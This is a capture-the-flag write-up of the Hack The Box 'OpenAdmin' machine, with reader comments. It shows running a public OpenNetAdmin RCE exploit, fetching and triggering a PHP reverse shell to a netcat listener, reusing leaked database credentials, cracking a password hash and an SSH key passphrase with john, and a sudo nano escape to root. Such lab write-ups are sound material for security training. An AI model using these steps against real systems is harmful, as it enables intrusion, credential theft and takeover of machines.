CTF – HTB – OpenAdmin

Today we solve the OpenAdmin box on hackthebox.eu.

First we start with a basic nmap scan :

# Nmap 7.80 scan initiated Mon Jan 13 18:22:36 2020 as: nmap -sC -sV -o TCP_scan
Nmap scan report for openadmin.htb (
Host is up (0.097s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 13 18:23:07 2020 -- 1 IP address (1 host up) scanned in 31.21 seconds

Port 80 gives us the default Apache page, we proceed to scan directories with dirbuster :

root@kali:~/Desktop/htb/OpenAdmin# cat DirBusterReport-                                                                                    
DirBuster 1.0-RC1 - Report
Report produced on Mon Jan 13 18:20:13 EST 2020
Directories found during testing:

Dirs found with a 200 response:




Files found with a 301 responce:



Of all the directories /ona looks the most interesting… It is running the OpenNetAdmin software version 18.1.1, which a quick search with searchploit reveals that is vulnerable with to RCE.

root@kali:~/Desktop/htb/OpenAdmin# searchsploit OpenNetAdmin
--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                       |  Path
                                                                                                                     | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                                                        | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                                         | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                                                          | exploits/php/webapps/47691.sh
--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

We copy the file and execute it :

root@kali:~/Desktop/htb/OpenAdmin# cp /usr/share/exploitdb/exploits/php/webapps/47691.sh ./                                                                   
root@kali:~/Desktop/htb/OpenAdmin# chmod +x 47691.sh 
root@kali:~/Desktop/htb/OpenAdmin# dos2unix 47691.sh 
dos2unix: converting file 47691.sh to Unix format...
root@kali:~/Desktop/htb/OpenAdmin# bash 47691.sh
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

dos2unix is a simple binary to convert the text file format to a UNIX format. Then, to have a better shell we upload a php reverse shell, we run a simple HTTP server with python then we use wget on the victim’s machine to get it :

wget -O rev.php

We open a listener on our end and use curl to execute the php reverse shell :

root@kali:~/Desktop/htb/OpenAdmin# nc -lvp 9898                                                                                                               
listening on [any] 9898 ...                                                                                                                                   
connect to [] from openadmin.htb [] 58886                                                                                             
Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux                                                  
 00:16:10 up 15 min,  5 users,  load average: 5.25, 4.17, 2.16                                                                                                
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT                                                                                           
joanna   pts/1     00:02    5:57   0.06s  0.00s sshd: joanna [priv]                                                                           
jimmy    pts/3      00:03    8:49   0.03s  0.03s -bash                                                                                         
joanna   pts/5      00:08   57.00s  0.07s  0.07s -bash                                                                                         
jimmy    pts/6     00:08    4:50   0.04s  0.04s -bash                                                                                         
jimmy    pts/7      00:09   34.00s  0.05s  0.05s -bash                                                                                         
uid=33(www-data) gid=33(www-data) groups=33(www-data)                                                                                                         
/bin/sh: 0: can't access tty; job control turned off                                                                                                          
$ $ python3 -c "import pty;pty.spawn('/bin/bash');"                                                                                                           

We then explore the /ona directory and find mysql credentials, which we use to login with user jimmy by ssh :

www-data@openadmin:/var/www/ona/local/config$ ls -la                                                                                                          
ls -la                                                                                                                                                        
total 16                                                                                                                                                      
drwxrwxr-x 2 www-data www-data 4096 Nov 21 16:51 .                                                                                                            
drwxrwxr-x 5 www-data www-data 4096 Jan  3  2018 ..                                                                                                           
-rw-r--r-- 1 www-data www-data  426 Nov 21 16:51 database_settings.inc.php                                                                                    
-rw-rw-r-- 1 www-data www-data 1201 Jan  3  2018 motd.txt.example                                                                                             
-rw-r--r-- 1 www-data www-data    0 Nov 21 16:28 run_installer                                                                                                

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',

root@kali:~/Desktop/htb/OpenAdmin# ssh jimmy@
jimmy@'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jan 28 00:51:40 UTC 2020

  System load:  0.25              Processes:             421
  Usage of /:   49.4% of 7.81GB   Users logged in:       1
  Memory usage: 33%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Jan 28 00:48:30 2020 from

Still going straightforward, we visit /var/www/internal/ folder, which is under the ownership of jimmy user, that we have now accessed. The folder contain 3 php files : index.php which simply contains a form that sends a POST request and verify if the username is ‘jimmy’ and the password is some sha-512 hashed password, then redirects to main.php when the credentials are good. main.php simply echo’s the id_rsa of the user joanna on the box which we will have to pivot to.


      <h2>Enter Username and Password</h2>
      <div class = "container form-signin">
        <h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2>
            $msg = '';

            if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
              if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
                  $_SESSION['username'] = 'jimmy';
                  header("Location: /main.php");
              } else {
                  $msg = 'Wrong username or password.';


<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

We start by cracking the sha-512 hash :

root@kali:~/Desktop/htb/OpenAdmin# cat hash                                                                                                                   
root@kali:~/Desktop/htb/OpenAdmin# john --format=raw-sha512 --wordlist=/usr/share/wordlists/rockyou.txt hash
sing default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA512 [SHA512 256/256 AVX2 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 25.63% (ETA: 20:01:49) 0g/s 1751Kp/s 1751Kc/s 1751KC/s shafous..shadowfreee
root@kali:~/Desktop/htb/OpenAdmin# john --show hash

We can then send a POST request with the correct data to our page. However it is not hosted in the main directory… A lookup of listening port shows us that port 52846 is open so we send our request there :

jimmy@openadmin:/var/www/internal$ netstat -ano                                                                                                               
Active Internet connections (servers and established)                                                                                                         
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer                                                                         
tcp        0      0*               LISTEN      off (0.00/0/0)                                                                
tcp        0      0*               LISTEN      off (0.00/0/0)                                                                
tcp        0      0 *               LISTEN      off (0.00/0/0)                                                                
tcp        0      0    *               LISTEN      off (0.00/0/0)   
jimmy@openadmin:/var/www/internal$ curl -d "username=jimmy&password=Revealed" -X POST http://localhost:52846/main.php                                         
<pre>-----BEGIN RSA PRIVATE KEY-----                                                                                                                          
Proc-Type: 4,ENCRYPTED                                                                                                                                        
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D                                                                                                        
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

The next step is to crack this ssh key and to get is passphrase, then we can login as joanna user :

root@kali:~/Desktop/htb/OpenAdmin# python ssh2john.py id_rsa

root@kali:~/Desktop/htb/OpenAdmin# john id_rsa_to_crack --format=SSH --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 15.75% (ETA: 18:45:29) 0g/s 809092p/s 809092c/s 809092C/s zumiez33..zumiewan
0g 0:00:00:05 30.40% (ETA: 18:45:26) 0g/s 893846p/s 893846c/s 893846C/s prinny7..prinni123
0g 0:00:00:08 47.95% (ETA: 18:45:26) 0g/s 865528p/s 865528c/s 865528C/s jlb2qe..jlb2180
bloodninjas      (id_rsa)
1g 0:00:00:15 DONE (2020-01-27 18:45) 0.06281g/s 900860p/s 900860c/s 900860C/sa6_123..*7¡Vamos!
Session completed

We then login as joanna with and quickly find our way to get root:

root@kali:~/Desktop/htb/OpenAdmin# ssh -i id_rsa joanna@
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jan 28 01:15:03 UTC 2020

  System load:  0.21              Processes:             238
  Usage of /:   49.2% of 7.81GB   Users logged in:       1
  Memory usage: 33%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Jan  2 21:12:40 2020 from
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

Since we know we can execute /bin/nano as root, we can easily escape the shell, you can look more into gtfobins here.

sudo /bin/nano /opt/priv
reset; sh 1>&0 2>&0
# id
uid=0(root) gid=0(root) groups=0(root)

And we owned the box!

Thanks for reading!

3 thoughts on “CTF – HTB – OpenAdmin”

  1. the only one part i am stuck on is privilege escalation from joanna to root. I literally pasted this from GTFO bins and changed the first line to what we have rights to execute

    “sudo /bin/nano /opt/priv
    reset; sh 1>&0 2>&0”

    So it nano’s the file priv in /opt/
    and inside priv i have
    reset; sh 1>&0 2>&0”

    but when I type id in the command line im still Joanna, have i done something wrong? 🙁

    1. Hey Jake,
      You can’t copy paste all of it.
      ^R^X is not a command, is what you have to press to open the shell in the nano binary. Then you input the command “reset; sh 1>&0 2>&0”.

Leave a Reply

Your email address will not be published. Required fields are marked *